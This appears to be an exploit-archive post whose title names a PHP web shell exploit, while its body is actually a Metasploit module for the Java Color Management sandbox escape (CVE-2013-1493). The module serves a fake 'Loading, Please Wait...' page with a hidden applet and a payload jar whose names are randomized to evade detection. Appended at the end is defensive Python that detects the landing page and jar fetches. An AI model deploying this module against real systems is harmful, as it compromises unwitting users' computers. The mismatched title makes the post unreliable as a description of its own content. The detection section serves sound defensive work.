STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Pre-built applet classes shipped with the framework (data/exploits/cve-2013-1493)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Randomize the entry-point class name (same length as "Init")
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the "metasploit"/"Payload" markers in every jar entry
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
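The module above leaves two fixed traces a defender can key on: the "Loading, Please Wait..." landing page carrying a 1x1 applet whose archive is an 8-letter random .jar and whose class name is 4 random letters, and the follow-up fetch of that .jar by a Java user agent. The following detection logic is an added example, not part of this post or of Metasploit; the regexes, the combined-format log layout and all sample bodies and log lines are constructed here.

```python
import re

# Landing page shape from the module's generate_html: a "Loading, Please
# Wait..." page with a 1x1 applet, an 8-letter random .jar archive and a
# 4-letter class name (rand_text_alpha("Init".length)). Regexes constructed here.
APPLET_RE = re.compile(
    r'<applet\s+archive="(?P<jar>[A-Za-z]{8})\.jar"\s+'
    r'code="[A-Za-z]{4}\.class"\s+width="1"\s+height="1"\s*>', re.IGNORECASE)
TITLE_RE = re.compile(r"<title>Loading, Please Wait\.\.\.</title>", re.IGNORECASE)
# Combined-format access log line, assumed for this example.
LOG_RE = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
RANDOM_JAR_RE = re.compile(r"/[A-Za-z]{8}\.jar$")

def classify_response(body):
    """Flag an HTTP response body that matches the module's landing page."""
    m = APPLET_RE.search(body)
    findings = {
        "hidden_applet": m is not None,
        "loading_title": TITLE_RE.search(body) is not None,
        "archive": m.group("jar") + ".jar" if m else None,
    }
    findings["suspicious"] = findings["hidden_applet"] and findings["loading_title"]
    return findings

def random_jar_fetches(log_lines):
    """Successful fetches of 8-letter .jar names by a Java user agent: the
    follow-up request the served applet makes after the landing page."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or m.group("status") != "200":
            continue
        if RANDOM_JAR_RE.search(m.group("path")) and "Java/" in m.group("ua"):
            hits.append((m.group("path"), m.group("ua")))
    return hits

# Constructed samples, not captured traffic.
SAMPLE_MALICIOUS = ('<html><head><title>Loading, Please Wait...</title></head>'
                    '<body><center><p>Loading, Please Wait...</p></center>'
                    '<applet archive="qwertyui.jar" code="abcd.class" width="1" height="1">'
                    '</applet></body></html>')
SAMPLE_BENIGN = ('<html><head><title>Chess</title></head><body>'
                 '<applet archive="chess.jar" code="chess.Main.class" width="640" height="480">'
                 '</applet></body></html>')
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Apr/2013:17:31:17 +0800] "GET /abc/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [04/Apr/2013:17:31:18 +0800] "GET /abc/qwertyui.jar HTTP/1.1" 200 9000 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15"',
]
```

Pairing a landing-page hit with a random .jar fetch from the same client within a few seconds gives a much lower false-positive rate than either signal alone, since benign applet pages rarely use 1x1 dimensions or random archive names.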